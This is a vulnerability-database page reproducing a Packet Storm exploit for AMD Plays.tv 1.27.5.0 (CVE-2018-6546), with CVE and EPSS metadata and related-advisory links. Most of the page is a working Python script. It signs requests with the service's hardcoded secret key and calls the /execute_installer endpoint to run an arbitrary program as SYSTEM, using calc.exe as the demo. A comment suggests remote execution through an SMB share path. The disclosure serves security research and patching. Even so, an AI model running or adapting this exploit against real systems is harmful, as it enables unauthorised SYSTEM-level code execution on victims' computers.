Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSecuriferaPACKETSTORM:147199
HistoryApr 15, 2018 - 12:00 a.m.

AMD Plays.tv 1.27.5.0 Arbitrary File Execution

2018-04-1500:00:00
Securifera
packetstormsecurity.com
21

0.505 Medium

EPSS

Percentile

97.5%

JSON
`########################################################################  
# http://support.amd.com/en-us/download?cmpid=CCCOffline -   
# Click "Automatically Detect - Download Now"  
# Installation Automatically Installs "Raptr, Inc Plays TV Service"  
#  
# OR  
#  
# https://plays.tv/download  
#  
# Target OS: Windows( Any )  
# Privilege: SYSTEM  
# Type: Arbitrary File Execution  
#  
# Notes: Second minor bug allows for arbitrary file write of   
# uncontrolled data using the /extract_files path.  
#  
########################################################################  
  
#!/usr/bin/python3  
import urllib.request  
import json  
import hashlib  
  
def check_svc( path, data ):  
  
#Setup request  
request = urllib.request.Request(addr)  
  
#add post data  
try:  
resp = urllib.request.urlopen(request, "data".encode("utf-8"))  
return "[-] Not Raptr, Plays TV service"  
except urllib.error.HTTPError as err:  
error_message = err.read().decode("utf-8")  
if error_message == 'Security failed - Missing hash or message[data]':  
return "[+] Raptr, Plays TV service"  
  
def post_req( path, data ):  
  
secret_key = 'a%qs0t33QgiE6ut^0I&Y'  
  
#Setup request  
request = urllib.request.Request(addr)  
json_data = json.dumps(data)  
  
m = hashlib.md5()  
hash_data = path + json_data + secret_key  
m.update(hash_data.encode('utf8'))  
hash_str = m.hexdigest()  
  
#add post data  
p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")  
resp = urllib.request.urlopen(request, p_data)  
return resp.read()  
  
#Target IP address  
ip = '127.0.0.1'  
  
##############################################################  
# The service binds to an ephemeral port defined at  
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]   
##############################################################  
port = 50452  
  
##############################################################  
# The service calls CreateProcess with the following format:   
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)  
#  
# One way to achieving remote code execution is to use SMB  
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"  
##############################################################  
cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution  
data = {  
"installer": cmd,  
"appdata": cmd  
}  
  
#Set url  
path = '/execute_installer'  
addr = 'http://' + ip + ':' + str(port) + path  
  
#Check if the remote service is a Raptr Plays TV svc  
#ret = check_svc(data, path)  
#print(ret)  
  
#Exploit service  
ret = post_req(path, data)  
print(ret)  
  
`

Related

checkpoint_advisories 1
cvelist 1
zdt 1
prion 1
nvd 1
cve 1
checkpoint_advisories
checkpoint_advisories
Plays.tv Remote Code Execution (CVE-2018-6546)
2020-06-05 00:00:00
cvelist
cvelist
CVE-2018-6546
2018-04-13 16:00:00
zdt
zdt
AMD Plays.tv 1.27.5.0 - plays_service.exe Arbitrary File Execution Exploit
2018-04-17 00:00:00
prion
prion
Code injection
2018-04-13 16:29:00
nvd
nvd
CVE-2018-6546
2018-04-13 16:29:01
cve
cve
CVE-2018-6546
2018-04-13 16:29:01

0.505 Medium

EPSS

Percentile

97.5%

JSON
Related for PACKETSTORM:147199
checkpoint_advisories1cvelist1zdt1prion1nvd1cve1